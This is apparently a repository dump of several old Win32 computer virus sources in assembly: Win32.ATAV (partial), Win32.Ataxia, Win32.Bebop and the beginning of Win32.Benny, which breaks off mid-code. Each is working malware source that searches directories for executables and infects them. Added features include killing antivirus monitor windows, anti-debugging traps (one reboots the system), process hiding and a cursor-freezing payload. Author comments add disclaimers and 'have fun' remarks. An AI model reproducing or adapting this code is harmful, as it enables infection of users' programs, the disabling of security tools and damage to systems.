ddSetEndOfFile dd 0
ddGetSystemTime dd 0
ddGetModuleHandleA dd 0
ddWriteFile dd 0
max_path EQU 260
se_Kernel32 db 'KERNEL32.dll',0
Anti_AV:
_Grisoft db 'avg?????.dat',0
_AVP db 'AVP.CRC',0
_TBAW db 'anti-vir.dat',0
_MSAV db 'CHKLIST.MS',0
_Kaspersky_ db 'AVP Monitor',0
_Grisoft_ db 'AVG Control Center',0
_Exe db '*.EXE',0
infections dd 0
fnx dd 0
Crypt_End:
Mutate1:
mov ecx,SizeCrypt
lea esi,[ebp + Crypto]
decr:
xor dword ptr [esi],0FFh
inc esi
loop decr
End_Mutate:
ret
Write_File proc
call Mutate1
mov edi, eax
lea esi,[Start+ebp]
mov ecx, VirusSize
rep movsb
call Mutate1
ret
Write_File endp
Virus_End:
SYSTEMTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMilliseconds WORD ?
ends
filetime STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
filetime ENDS
win32_find_data STRUC
FileAttributes DD ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh DD ?
FileSizeLow DD ?
Reserved0 DD ?
Reserved1 DD ?
FileName DB max_path DUP (?)
AlternateFileName DB 13 DUP (?)
DB 3 DUP (?)
win32_find_data ENDS
search win32_find_data ?
SystemTime SYSTEMTIME <>
windir db 128h dup(0)
sysdir db 128h dup(0)
crtdir db 128h dup(0)
Virtual_End:
First_Gen:
pushad
call Next_Gen
Next_Gen:
pop ebp
sub ebp,offset Next_Gen
mov ecx,SizeCrypt
lea esi,[ebp + Crypto]
decri:
xor dword ptr [esi],0FFh
inc esi
loop decri
push 0
push offset TextF
push offset TextF1
push 0
call MessageBoxA
popad
Jmp Start
TextF db 'Win32.ATAV by Radix16[MIONS]',0
TextF1 db 'First generation sample',0
End First_Gen
Win32/Infector/Win32.Ataxia.asm
+341
View File
@@ -0,0 +1,341 @@
;Win32.Ataxia By Evul
.386p
.model flat
.code ;setting para el Tasm
;=============================
extrn LocalFree:proc;
extrn LocalAlloc:proc;
extrn GetModuleHandleA:proc;
extrn GetModuleFileNameA:proc;
extrn ExitProcess:proc;
extrn WinExec:proc;
extrn GetCommandLineA:proc;
extrn _lopen:proc;
extrn _lcreat:proc;
extrn _lread:proc;
extrn _lwrite:proc;
extrn FindFirstFileA:proc;
extrn FindNextFileA:proc;
extrn DeleteFileA:proc;
extrn MoveFileA:proc;
extrn CloseHandle:proc;
;extrn CreateFileA:proc;
extrn WriteFile:proc;
extrn GetSystemDirectoryA:proc;
extrn GetWindowsDirectoryA:proc;
extrn GetCurrentDirectoryA:proc;
extrn SetCurrentDirectoryA:proc;
extrn lstrcat:proc;
;============================= ;funciones del api que vayamos a usar
include windows.inc
;=============================
virussize equ 8192 ;constante que contiene el tamaño del virus
;=============================
begin:
mov ebx, 0ffffffh
push ebx ;cantidad de memoria a reservar (0ffffffh)
push LMEM_ZEROINIT ;flag (inicializar a cero)
call LocalAlloc ;funcion para separa una cantidad de memoria especficada
mov dword ptr [heap], eax ;puntero a la memoria
cmp eax, 0 ;si es 0 hubo un error
je done_this ;asi que nos largamos de aqui
fixhost:
push offset handle1
call GetModuleHandleA ;obtiene el handle del archivo ejecutado
push 50
push offset handle2
push eax
call GetModuleFileNameA ;guarda en handle2 el nombre de este archivo
push offset filedta
push offset handle2
call FindFirstFileA ;Busca este archivo , para obtener datos sobre el
lea esi, [cFileName] ;pone en esi el nombre del file encontrado
lea edi, [newfilename] ;apunta edi al buffer del nuevo nombre de file
stowit_:
lodsb
cmp al, '.'
je addext_
stosb
jmp stowit_ ;busca el punto dentro del nombre del file
addext_:
stosb
lea esi, [newext]
movsw
movsw ;le agrega la extension .vxe
push 0
push offset cFileName
call _lopen ;abre el archivo .vxe
mov dword ptr [open_handle],eax ;guarda el handle del archivo
push dword ptr [nFileSizeLow]
push dword ptr [heap]
push eax
call _lread ;mueve a la memoria el todo el ejecutable
push dword ptr [open_handle]
call CloseHandle ;cierra el archivo
push 0
push offset newfilename
call _lcreate ;crea de nuevo el .exe
mov ebx, dword ptr [nFileSizeLow]
sub ebx, virussize ;le resta al tamaño del .exe el del virus para obtener el tamaño
push ebx ;del .exe original
mov ebx, dword ptr [heap]
add ebx, virussize ;mueve el puntero al principio del .exe original
push ebx
push dword ptr [open_handle]
call _lwrite ;y luego lo escribe con el nombre del exe
push dword ptr [open_handle]
call CloseHandle ;cierra el .exe
push 0
push offset evulzfile
call _lcreat ;crea un archivo con nombre evul.tmo
mov dword ptr [open_handle],eax
push virussize
push dword ptr [heap]
push eax
call _lwrite ; y escribe en este el virus original
push dword ptr [open_handle]
call CloseHandle ; y cierra evul.tmp
push 2
push offset evulzfile
call _lopen ;vuelve y abre evul.tmp (?????)
mov dword ptr [open_handle],eax
push virussize
push dword ptr [heap]
push eax
call _lread ;lee el virus DE NUEVO a memoria (?????)
push dword ptr [open_handle]
call CloseHandle ;vuelve y cierra el archivo
execit:
jmp dirloop ;salta a la busque de archivos
FEXY:
mov byte ptr [infected],0 ;pone # de infected a 0
push offset filedta
push offset maska
call FindFirstFileA ;busca archivos .exe en el path actual
mov dword ptr [handle_],eax ;guarda el handle de busqueda
cmp eax, 0
je done_this ;si hay un error nos largamos de aqui
check:
mov bx, word ptr[cFileName]
cmp bx, 'XE' ; Explorer ?
je nextfile
cmp bx, 'UR' ; RUNDll ?
je nextfile
cmp bx, 'ur' ; rundll ?
je nextfile
cmp bx, 'ME' ; Emm386 ??
je nextfile
cmp bx, 'va' ; Antivirus ?
je nextfile
cmp bx, 'sv' ; Antivirus ?
je nextfile
cmp dword ptr [nFileSizeLow],(0ffffffh-virussize); Muy Grande ??
jg nextfile ;si cualquiera de las anteriores se cumple no lo infecta
push 2
push offset cFileName
call _lopen ;abrimos la victima
mov dword ptr [open_handle],eax
mov ebx, dword ptr [nFileSizeLow]
mov dword ptr [hostsize], ebx ;guardamos en ebx el tamaño del exe a infectar
push ebx
mov ebx, dword ptr [heap]
add ebx, virussize ;le sumamos al tamaño del exe el tamaño del virus
push ebx
push eax
call _lread ;leemos los datos del exe en la memoria luego del cuerpo del virus
push dword ptr [open_handle]
call CloseHandle ;lo cerramos
mov ebx, dword ptr [heap]
add ebx, (virussize+12h)
cmp byte ptr [ebx], 'X'
je bail
add ebx, 6
cmp byte ptr [ebx], '@'
jne bail ;miramos en 12h y en 18h esta la marca de infeccion
push 2
push offset cFileName
call _lopen ;Volvemos a abrir el archivo (???)
mov dword ptr [open_handle],eax
mov ebx, dword ptr [nFileSizeLow]
add ebx, virussize ;obtenemos el tamaño del exe mas el del virus
push ebx
push dword ptr [heap]
push eax
call _lwrite ;escribimos el exe nuevo y el virus
inc byte ptr [infected]
bail:
push dword ptr [open_handle]
call CloseHandle ; lo cerramos
cmp byte ptr [infected],5
je done_this ;si ya infectamos 5 nos largamos
nextfile:
push offset filedta
mov eax, dword ptr [handle_]
push eax
call FindNextFileA ;continuamos con la busqueda de EXEs
cmp eax, 0
je done_this ;si no hay mnas nos largamos
jmp check
done_this:
ret
dirloop:
call FEXY ;se devuelve
push offset curdir
push 260
call GetCurrentDirectoryA
uploop:
push offset updir
call SetCurrentDirectoryA
cmp eax, 1
jne trywindows
call FEXY ;nos movemos al directorio de arriba (\..) y buscamos otros 5 EXEs
trywindows:
push 260
push offset windir
call GetWindowsDirectoryA
push offset windir
call SetCurrentDirectoryA
call FEXY ;nos movemos al directorio de windows y buscamos otros 5 EXEs
push offset curdir
call SetCurrentDirectoryA ;restauramos el antiguo dir.
mov eax, dword ptr [heap]
call LocalFree ;liberamos la memoria reservada
call GetCommandLineA
mov esi, eax ;obtenemos la linea de comandos del ejecutable actual
loopdot:
mov edi, esi
lodsb
cmp al, '.'
jne loopdot ;busacmso el punto
stosb
lea esi, [fixcmd]
movsw
movsw ;le agrgamos la extension VXE
call GetCommandLineA
push 00000001
inc eax
push eax
call WinExec ; y lo ejecutamos fianlmente
deleteit:
push offset newfilename
call DeleteFileA ;borramos el archivo .exe temporal
cmp eax, 0
je deleteit ;si hay un error lo volvemos a borrar
push offset evulzfile
call DeleteFileA ; borramos el evul.tmp
push 0
call ExitProcess ; y por fin terminamos
;=============================
.data
windir db 260 dup(0)
curdir db 260 dup(0)
maska db '*.exe',0
newext db 'VXE',0
fixcmd db 'VXE '
evulzfile db 'Evul.tmp',0
handle_ dd 0
open_handle dd 0
heap dd 0
hostsize dd 0
commandline dd 0
updir db '..',0
filedta:
FileAttributes dd 0
CreationTime db 8 dup(0)
LastAccessTime db 8 dup(0)
LastWriteTime db 8 dup(0)
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
cFileName db 50 dup(0)
cAltFileName db 50 dup(0)
handle1 db 50 dup(0)
handle2 db 50 dup(0)
written dd 0
infected db 0
newfilename db 50 dup(0)
end begin
Win32/Infector/Win32.Beagle.7z
BIN
View File
Binary file not shown.
Win32/Infector/Win32.Bebop.asm
+634
View File
@@ -0,0 +1,634 @@
COMMENT#
____________________________________________________________________________________________
Win32.Bebop - Virus [Companion]
coded by -DiA- (c)03
GermanY
____________________________________________________________________________________________
Intro:
Yeah! My new creature. This is a Companion Virus (what else?). Ok, I hope you enjoy
this, and let the CODE speak...
Disclaimer:
I am NOT responsible for any damage that you do! You can need the code however you want..
My motherlanguage is not English, I hope you understand what I mean.
Feel FREE to write any Comments to
DiA_hates_machine@gmx.de
Infection:
-infect current directory
-travel directory's downwards and infect them all
-go to the Windows folder and infect them
-go to the Personal folder and infect them
-infect twenty files per run
-don't infect again
Features:
-Anti-Debug
-Anti-AV-Monitors
-Anti-Bait
Payload:
-on the first day every month
-first show a little message
-after that the cursor is very slow
-workz with a thread
Greetz:
Industry - m8! See on rRLF 3
Monochrom - thanx for TASM32, you see... ;)
Weed - thanx for all, my little ganja
MyCrew - Next month, HARDCORE at Skatehall! Rock on.
?????? - and to the fucker that send me two or three mails: "Be a Internet Million..
" FUCK YOU, YOU STUPID MOTHERFUCKER! Don't send me mail's, Son of a Bitch!
First Generation:
;-----cut-----Bebop666.asm---------------------------------------------------------------
.386
.model flat
jumps
extrn MessageBoxA :PROC
extrn ExitProcess :PROC
.data
oTitle db 'Win32.Bebop - Virus - First Generation',0
oMsg db 'Yo dood, this is only the first generation',10,13
db 'from the Bebop - Virus. Have fun, now you',10,13
db 'are infected...',10,13,10,13
db ' coded by DiA 03 GermanY',0
.code
FirstGen:
push 16
push offset oTitle
push offset oMsg
push 0
call MessageBoxA
push 0
call ExitProcess
end FirstGen
;-----cut--------------------------------------------------------------------------------
Compile:
First Gen->
TASM32 /z /ml /m3 Bebop666,,;
TLINK32 -Tpe -c -aa Bebop666,Bebop666,, import32.lib
rename Bebop666.EXE Bebop.SYS
Virus ->
TASM32 /z /ml /m3 Bebop,,;
TLINK32 -Tpe -c -aa Bebop,Bebop,, import32.lib
[Bebop.EXE and Bebop.SYS must be in one directory]
Ok, that's it! I write many comment's in the code...
...HAVE FUN and read my tut's! :)
____________________________________________________________________________________________
____________________________________________________________________________________________
#
;-------------------------------------------------------------------------------------------
;-----HEAD----------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.386
.model flat
jumps
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Needed API's--------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
extrn IsDebuggerPresent :PROC
extrn GetCurrentProcessId :PROC
extrn RegisterServiceProcess :PROC
extrn GetCommandLineA :PROC
extrn lstrcpyA :PROC
extrn CreateProcessA :PROC
extrn CopyFileA :PROC
extrn FindFirstFileA :PROC
extrn FindNextFileA :PROC
extrn SetCurrentDirectoryA :PROC
extrn RegOpenKeyExA :PROC
extrn RegQueryValueExA :PROC
extrn RegCloseKey :PROC
extrn FindWindowA :PROC
extrn PostMessageA :PROC
extrn GetWindowsDirectoryA :PROC
extrn GetSystemTime :PROC
extrn CreateThread :PROC
extrn CloseHandle :PROC
extrn GetCursorPos :PROC
extrn SetCursorPos :PROC
extrn Sleep :PROC
extrn MessageBoxA :PROC
extrn ExitProcess :PROC
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Nedded DATA's-------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.data?
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)
SYSTEMTIME:
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMilliseconds WORD ?
POINT:
x DWORD ?
y DWORD ?
VirusFile db 260d dup (?)
HostFile db 260d dup (?)
TargetFile db 260d dup (?)
ProcessInfo dd 4 dup (?)
StartupInfo dd 4 dup (?)
PersonalFolder db 260d dup (?)
WindowsFolder db 260d dup (?)
.data
AVP db 'AVP Monitor',0
McAfee db 'McAfee VShield',0
Solomon db 'SCAN32',0
FProt db 'FP-WIN',0
Norton db 'NAVAPW32',0
FindHandle dd 0
RegHandle dd 0
lpType dd 0
ThreadID dd 0
FileMask db '*.EXE',0
FileCounter db 20
Size dd 260d
ShellFolders db '.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
Personal db 'Personal',0
oTitle db 'Win32.Bebop - Virus',0
oMsg db 'Yeah! Bebop get''s you. Don''t be angry, this nice',10,13
db 'Virus don''t have any DESTRUCTIVE CODE!',10,13
db 'Or for stupid people: Wait a while, next day the',10,13
db 'Bebop-Virus go away...',10,13,10,13
db ' Win32.Bebop coded by DiA (c)2003 [GermanY]',0
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Win32.Bebop starts--------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
.code
Bebop:
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Fuck some AV-Monitors-----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call AntiDebugger ;check for debugger
mov esi,offset AVP
call KillMonitor ;kill the window
mov esi,offset McAfee
call KillMonitor ;kill the window
mov esi,offset Solomon
call KillMonitor ;kill the window
mov esi,offset FProt
call KillMonitor ;kill the window
mov esi,offset Norton
call KillMonitor ;kill the window
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Hide the Bebop Process----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCurrentProcessId ;get id to hide the Bebop
push 1 ;register as "SystemService"
push eax ;ProcessID
call RegisterServiceProcess
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Restore Hostname & Run Host-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
call GetCommandLineA ;looks like "C:\MyC00lPr0gZ\veryCool\Fucking.EXE"
inc eax ;fuck the "
push eax
push offset VirusFile ;copy it to VirusFile to work with it
call lstrcpyA ;copy the string
mov esi,offset VirusFile
call GetPoint ;get the point (...ddd.EXE") to clear "
mov dword ptr [esi+4],00000000h ;fuck it, now we have the path of the VirusFile
push offset VirusFile ;copy path of VirusFile to
push offset HostFile ;HostFile, to work with it
call lstrcpyA
mov esi,offset HostFile
call GetPoint ;get point to rename it
mov dword ptr [esi],5359532Eh ; SYS. ,now we have the path of the HostFile
call AntiDebugger ;check for debugger
xor eax,eax ;null
push offset ProcessInfo
push offset StartupInfo
push eax
push eax
push 10h ;create a new process
push eax
push eax
push eax
push offset HostFile ;path for HostFile
push offset HostFile ;run this file
call CreateProcessA
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Travel Directorys & Infect them-------------------------------------------------------
;-------------------------------------------------------------------------------------------
mov esi,offset HostFile ;don't need anymore, use it to get the directory
call GetPoint ;first get the point
mov ebx,esi ;first get the path of current dir
call CDdotdot ;-"-
call InfectFiles ;and infect files in this directory
InfectCDdotdot:
call CDdotdot ;cd..
test ebx,ebx ;error code?
jz InfectNext ;if yes search other dir's
call InfectFiles ;infect it!
jmp InfectCDdotdot ;cd.. , infect, cd.. , ...
InfectNext: ;other directorys
call AntiDebugger ;often!
push 260d
push offset WindowsFolder ;save there
call GetWindowsDirectoryA ;easyer to get it with api, not registry
mov esi,offset WindowsFolder ;set directory
call SetDirectory
call InfectFiles ;and infect them
call GetPersonalDir ;infect them too
mov esi,offset PersonalFolder ;to set the directory
call SetDirectory ;set it
call InfectFiles ;infect them
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Payload, if Day 1. of Month-----------------------------------------------------------
;-------------------------------------------------------------------------------------------
push offset SYSTEMTIME ;structure
call GetSystemTime ;get time
cmp word ptr [wDay],1 ;first day of mounth?
jne FuckingDebugger ;if not exit
push offset ThreadID ;the ID
push 0
push 0
push offset StopCursor ;the pklace where are the thread
push 0
push 0
call CreateThread
push eax ;close da handle
call CloseHandle ;close it
GetCurrentPos: ;get current cursor pos
push offset POINT ;structure
call GetCursorPos
jmp GetCurrentPos ;again and again
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Exit & stay (sic)---------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
FuckingDebugger:
push 0
call ExitProcess
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Infect Files Procedure----------------------------------------------------------------
;-------------------------------------------------------------------------------------------
InfectFiles: ;procedure
call AntiDebugger ;fuck you!
push offset WIN32_FIND_DATA ;Win32 find data is kewl
push offset FileMask ;'*.EXE',0
call FindFirstFileA ;find first
mov dword ptr [FindHandle],eax ;save da handle
FindNext:
test eax,eax ;error?
jz FindMore ;check other directory's
push offset WFD_szFileName ;copy filename of founded file
push offset TargetFile ;to rename and copy it
call lstrcpyA
xor eax,eax ;null
mov esi,offset TargetFile ;is it bait?
mov edi,esi
mov ecx,48d ;0
CheckBait: ;check for bait
lodsb ;load one byte
CheckNum: ;check for a digit
cmp eax,46d ; point?
je Bait ;don't infect, it's a fucking bait
cmp eax,ecx ;a number?
je ScanNext ;scan next digit
cmp eax,57d ;over 9
ja NoBait ;it's no bait, ...infect them
inc ecx ;check next number (0,1,2,3,4,...)
jmp CheckNum ;again
ScanNext: ;scan next place
stosb ;save the byte (edi,esi +1)
mov ecx,48d ;restore ecx
jmp CheckBait ;check ma
NoBait: ;go on with infection
mov esi,offset TargetFile ;find point to rename
call GetPoint
mov dword ptr [esi],5359532Eh ;rename to .SYS
push 1 ;don't copy if file allready exist
push offset TargetFile ;copy to this path and filename (TargetFile.SYS)
push offset WFD_szFileName ;the real name to the fake name
call CopyFileA
test eax,eax ;error -> file already exist
jz FindNextPhile ;jmp
push 0 ;copy always
push offset WFD_szFileName ;copy the VirusFile over the real File
push offset VirusFile ;now HostName: xxx.SYS VirusName: xxx.EXE
call CopyFileA
dec byte ptr [FileCounter] ;counter -1
cmp byte ptr [FileCounter],0 ;zero?
jz FuckingDebugger ;if yes exist
FindNextPhile:
call AntiDebugger ;antiman
Bait: ;search next file, last was a bait
push offset WIN32_FIND_DATA ;get info from Win32FindData
push dword ptr [FindHandle] ;handle of file we search...
call FindNextFileA
jmp FindNext ;go up!
FindMore:
ret ;return and search in other directory's
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Anti Debug Procedure------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
AntiDebugger:
call IsDebuggerPresent ;check for Debugger
test eax,eax ;if yes jmp to...
jnz FuckingDebugger ;FuckingDebugger:
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Get Point Procedure-------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
GetPoint: ;procedure
cmp byte ptr [esi],'.' ;check for point
jz FoundPoint ;if point, return
inc esi ;if not check next place
jmp GetPoint
FoundPoint:
call AntiDebugger
ret ;return
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----CD.. Procedure------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
CDdotdot: ;procedure
GetSlash: ;'\'
cmp byte ptr [ebx],'\'
jz ClearAfter ;if yes, clear al after the \
cmp byte ptr [ebx],':' ; are we at C:\
jz SetError ;set a error code and exit procedure
dec ebx ;esi -1
jmp GetSlash ;search again
ClearAfter: ;clear all after the slash
inc ebx ;but don't clear \ (needed to travel!)
mov dword ptr [ebx],00000000h ;fuck it all, fuck this world, fuck everything th...
sub ebx,2 ;go in front of \
mov esi,offset HostFile ;now a path for the directory cd..
SetDirectory: ;procedure
push esi
call SetCurrentDirectoryA ;set the dir
ret ;return
SetError: ;we are at C:, can't cd.. anymore
xor ebx,ebx ;zero
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Read Personal Directory from Registry Procedure---------------------------------------
;-------------------------------------------------------------------------------------------
GetPersonalDir: ;procedure
push offset RegHandle ;save there the handle
push 001F0000h ;read and write
push 0
push offset ShellFolders ;subkey
push 80000003h ;HKEY_...
call RegOpenKeyExA ;open the subkey
test eax,eax ;error?
jnz RegError ;set error code and return
push offset Size ;260d
push offset PersonalFolder ;save the value there
push offset lpType ;fuck off
push 0
push offset Personal ;value name
push dword ptr [RegHandle] ;handle from subkey
call RegQueryValueExA ;read!
RegError: ;error!
call AntiDebugger
push dword ptr [RegHandle] ;close reg
call RegCloseKey
ret
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Anti AV-Monitor Procedure-------------------------------------------------------------
;-------------------------------------------------------------------------------------------
KillMonitor:
call AntiDebugger
push esi ;offset to monitor name
push 0
call FindWindowA ;find it
test eax,eax ;error?
jz FuckNextMonitor ;return
push 0
push 0
push 12h ;WM_QUIT = kill
push eax ;handle of window
call PostMessageA ;shot 'em up
FuckNextMonitor:
ret ;return
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Stop the Cursor Procedure-------------------------------------------------------------
;-------------------------------------------------------------------------------------------
StopCursor:
push 16
push offset oTitle
push offset oMsg
push 0
call MessageBoxA
call AntiDebugger
SleepStop:
push 2000d ;sleep 2sek
call Sleep
xor edx,edx
StopIt:
cmp edx,4000d
je SleepStop
push dword ptr [y] ;y coor
push dword ptr [x] ;x coor
call SetCursorPos ;stop it
inc edx
jmp StopIt ;stop again
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;-----Win32.Bebop ends----------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
end Bebop
;-------------------------------------------------------------------------------------------
;-------------------------------------------------------------------------------------------
;------------------------------------------------------------------------Germany2003--------
Win32/Infector/Win32.Benny.asm
+994
View File
@@ -0,0 +1,994 @@
;-------------------------------------;
; Win32.Benny (c) 1999 by Benny ;
;-------------------------------------;
;
;
;
;Author's description
;---------------------
;
;Welcome to my second Win32 virus! Don't expect any new things, I only
;present u my last lame virus. Here is it...
;
;Features:
;----------
; - Win32 infector
; - appends to the last section (usualy .reloc)
; - "already infected" mark as my spec. 64bit checksum.
; - no use of absolute addresses, gets GetModuleHandleA API from IAT
; - compressed (API strings only)
; - using memory mapped files for smarter handling of 'em
; - direct action
; - nonencrypted
; - armoured (using SEH), TD32 fails
;
;Targets:
;---------
; - *.EXE
; - *.SRC
;
;How to build:
;--------------
; - tasm32 -ml -q -m4 benny.asm
; tlink32 -Tpe -c -x -aa -r benny,,, import32
; pewrsec benny.exe
;
;
;
;AVP's description
;------------------
;
;Benny's notes r in "[* *]".
;
;
;This is a direct action (nonmemory resident) parasitic [* compressed *] Win32
;virus. It searches for PE EXE files in the Windows, Windows system and current
;directories [* shit! It DOESN'T infect Windows/System directories! *], then
;writes itself to the end of the file. The virus has bugs and in many cases
;corrupts files while infecting them [* Sorry, this is my last lame virus *].
;The virus checks file names and does not infect the files: RUNDLL32.EXE,
;TD32.EXE, TLINK32.EXE, TASM32.EXE [* and NTVDM.EXE *]. While infecting the
;virus increases the size of last file section, writes itself to there and
;modifies necessary PE header fields including program startup address.
;
;The virus contains the "copyright" string:
;
; Win32.Benny (c) 1999 by Benny
;
;
;
;And here is that promised babe:
.386p ;386 instructions
.model flat ;32bit offset, no segments
include PE.inc ;include some useful files
include MZ.inc
include Useful.inc
include Win32api.inc
nFile = 1 ;constants for decompress stage
nGet = 2
nSet = 3
nModule = 4
nHandle = 5
nCreate = 6
nFind = 7
nFirst = 8
nNext = 9
nClose = 10
nViewOf = 11
nDirectoryA = 12
nEXE = 13
extrn GetModuleHandleA:PROC ;APIs needed by first generation
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
.data
db ? ;shut up, tlink32 !
ends
.code
Start_Virus:
pushad ;save all regs
call gdelta
ve_strings: ;compressed APIs
veszKernel32 db 'KERNEL32', 0
veszGetModuleHandleA db nGet, nModule, nHandle, 'A', 0
veszGetVersion db nGet, 'Version', 0
veszIsDebuggerPresent db 'IsDebuggerPresent', 0
veszCreateFileA db nCreate, nFile, 'A', 0
veszFindFirstFileA db nFind, nFirst, nFile, 'A', 0
veszFindNextFileA db nFind, nNext, nFile, 'A', 0
veszFindClose db nFind, nClose, 0
veszSetFileAttributesA db nSet, nFile, 'AttributesA', 0
veszCloseHandle db nClose, nHandle, 0
veszCreateFileMappingA db nCreate, nFile, 'MappingA', 0
veszMapViewOfFile db 'Map', nViewOf, nFile, 0
veszUnmapViewOfFile db 'Unmap', nViewOf, nFile, 0
veszSetFilePointer db nSet, nFile, 'Pointer', 0
veszSetEndOfFile db nSet, 'EndOf', nFile, 0
veszSetFileTime db nSet, nFile, 'Time', 0
veszGetWindowsDirectoryA db nGet, 'Windows', nDirectoryA, 0
veszGetSystemDirectoryA db nGet, 'System', nDirectoryA, 0
veszGetCurrentDirectoryA db nGet, 'Current', nDirectoryA, 0, 0
veszExe db '*', nEXE, 0
veszScr db '*.SCR', 0
veszNames db 'NTVDM', nEXE, 0 ;files, which we wont
db 'RUNDLL32', nEXE, 0 ;infect
db 'TD32', nEXE, 0
db 'TLINK32', nEXE, 0
db 'TASM32', nEXE, 0
vszNumberOfNamez = 5
end_ve_stringz db 0ffh ;end of compressed
;strings
string_subs: ;string substitutes
db 'File', 0
db 'Get', 0
db 'Set', 0
db 'Module', 0
db 'Handle', 0
db 'Create', 0
db 'Find', 0
db 'First', 0
db 'Next', 0
db 'Close', 0
db 'ViewOf', 0
db 'DirectoryA', 0
db '.EXE', 0
num = 14 ;number of 'em
gdelta: ;get delta offset
mov esi, [esp]
mov ebp, esi
sub ebp, offset ve_strings
lea edi, [ebp + v_strings]
next_ch:lodsb ;decompressing stage
test al, al
je copy_b
cmp al, 0ffh
je end_unpacking
cmp al, num+1
jb packed
copy_b: stosb
jmp next_ch
packed: push esi
lea esi, [ebp + string_subs]
mov cl, 1
mov dl, al
lodsb
packed2:test al, al
je _inc_
packed3:cmp cl, dl
jne un_pck
p_cpy: stosb
lodsb
test al, al
jne p_cpy
pop esi
jmp next_ch
un_pck: lodsb
test al, al
jne packed3
_inc_: inc ecx
jmp un_pck
seh_fn: @SEH_RemoveFrame ;remove exception frame
popad ;heal stack
call [ebp + MyGetVersion] ;get version of windoze
cmp eax, 80000000h ;WinNT ?
jb NT_debug_trap
cmp ax, 0a04h ;Win95 ?
jb seh_rs
call IsDebugger ;Win98, check, if debugger active
jecxz seh_rs ;no, continue
mov eax, 909119cdh ;yeah, reboot system
jmp $ - 4
NT_debug_trap:
call IsDebugger ;WinNT, check, if debugger active
jecxz seh_rs ;no, continue
xor esp, esp ;yeah, freeze app
IsDebugger:
call [ebp + MyIsDebuggerPresent] ;call checkin API
xchg eax, ecx
ret
quit: pop eax
mov eax, [ebp + OrigEPoint] ;get original entrypoint rva
sub eax, -400000h ;make it raw pointer
mov [esp.Pushad_eax], eax
popad
jmp eax ;jump to host
end_unpacking:
lea edx, [ebp + vszKernel32] ;KERNEL32
push edx
mov edx, [ebp + MyGetModuleHandleA] ;GetModuleHandleA API
call [edx] ;get module of kernel32
xchg eax, ecx
jecxz quit ;shit, not found, jump to host
xchg ecx, ebx
lea edi, [ebp + Virus_End] ;get addresses of APIs
